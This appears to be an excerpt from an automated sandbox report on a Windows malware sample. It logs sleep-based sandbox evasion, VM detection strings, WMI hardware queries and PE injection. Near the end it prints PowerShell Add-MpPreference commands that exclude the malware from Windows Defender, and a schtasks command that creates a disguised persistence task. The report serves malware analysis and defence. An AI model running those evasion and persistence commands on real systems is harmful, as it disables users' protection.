                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940Thread sleep time: -98629s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940Thread sleep time: -98500s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940Thread sleep time: -98390s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940Thread sleep time: -98281s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940Thread sleep time: -98171s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940Thread sleep time: -98062s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940Thread sleep time: -97952s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940Thread sleep time: -97843s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940Thread sleep time: -97734s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940Thread sleep time: -97606s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940Thread sleep time: -97499s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940Thread sleep time: -97390s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940Thread sleep time: -97279s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940Thread sleep time: -97171s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940Thread sleep time: -97062s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940Thread sleep time: -96952s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940Thread sleep time: -96843s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940Thread sleep time: -96728s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940Thread sleep time: -96620s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940Thread sleep time: -96515s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940Thread sleep time: -96406s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940Thread sleep time: -96296s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940Thread sleep time: -96187s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940Thread sleep time: -96077s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940Thread sleep time: -1200000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940Thread sleep time: -1199875s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940Thread sleep time: -1199766s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940Thread sleep time: -1199641s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940Thread sleep time: -1199531s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940Thread sleep time: -1199422s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940Thread sleep time: -1199313s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940Thread sleep time: -1199188s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940Thread sleep time: -1199063s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940Thread sleep time: -1198953s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940Thread sleep time: -1198839s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940Thread sleep time: -1198734s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940Thread sleep time: -1198625s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exe TID: 7940Thread sleep time: -1198515s >= -30000s
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 99849Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 99718Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 99609Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 99500Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 99390Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 99280Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 99167Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 99059Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 98937Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 98828Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 98718Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 98609Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 98500Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 98390Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 98246Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 98140Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 98031Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 97909Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 97796Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 97687Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 97565Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 97453Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 97334Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 97192Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 97078Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 96968Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 96858Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 96750Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 96640Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 96531Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 96421Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 96312Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 96202Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 96093Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 95984Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 95873Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 95765Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 95656Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 95546Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 1199969Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 1199844Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 1199734Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 1199625Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 1199516Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 1199407Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 1199282Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 1199157Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 1199047Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeThread delayed: delay time: 1198938Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 100000
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 99890
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 99781
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 99661
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 99531
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 99416
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 99312
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 99203
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 99093
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 98982
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 98874
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 98764
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 98629
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 98500
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 98390
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 98281
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 98171
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 98062
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 97952
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 97843
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 97734
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 97606
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 97499
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 97390
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 97279
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 97171
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 97062
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 96952
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 96843
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 96728
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 96620
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 96515
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 96406
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 96296
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 96187
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 96077
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 1200000
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 1199875
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 1199766
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 1199641
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 1199531
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 1199422
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 1199313
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 1199188
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 1199063
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 1198953
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 1198839
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 1198734
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 1198625
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeThread delayed: delay time: 1198515
                      Source: kAsh3nmsgs.exe, 00000008.00000002.4148783650.0000000000FFA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll;
                      Source: HHhSyZN.exe, 0000000D.00000002.4147346234.0000000001403000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS
                      Source: HHhSyZN.exe, 00000009.00000002.1767206531.0000000001276000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: HHhSyZN.exe, 00000009.00000002.1777549130.0000000009A07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kAsh3nmsgs.exe"
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HHhSyZN.exe"
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kAsh3nmsgs.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HHhSyZN.exe"Jump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeMemory written: C:\Users\user\Desktop\kAsh3nmsgs.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeMemory written: C:\Users\user\AppData\Roaming\HHhSyZN.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kAsh3nmsgs.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HHhSyZN.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HHhSyZN" /XML "C:\Users\user\AppData\Local\Temp\tmp4794.tmp"Jump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeProcess created: C:\Users\user\Desktop\kAsh3nmsgs.exe "C:\Users\user\Desktop\kAsh3nmsgs.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HHhSyZN" /XML "C:\Users\user\AppData\Local\Temp\tmp586D.tmp"
                      Source: C:\Users\user\AppData\Roaming\HHhSyZN.exeProcess created: C:\Users\user\AppData\Roaming\HHhSyZN.exe "C:\Users\user\AppData\Roaming\HHhSyZN.exe"
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Users\user\Desktop\kAsh3nmsgs.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\kAsh3nmsgs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
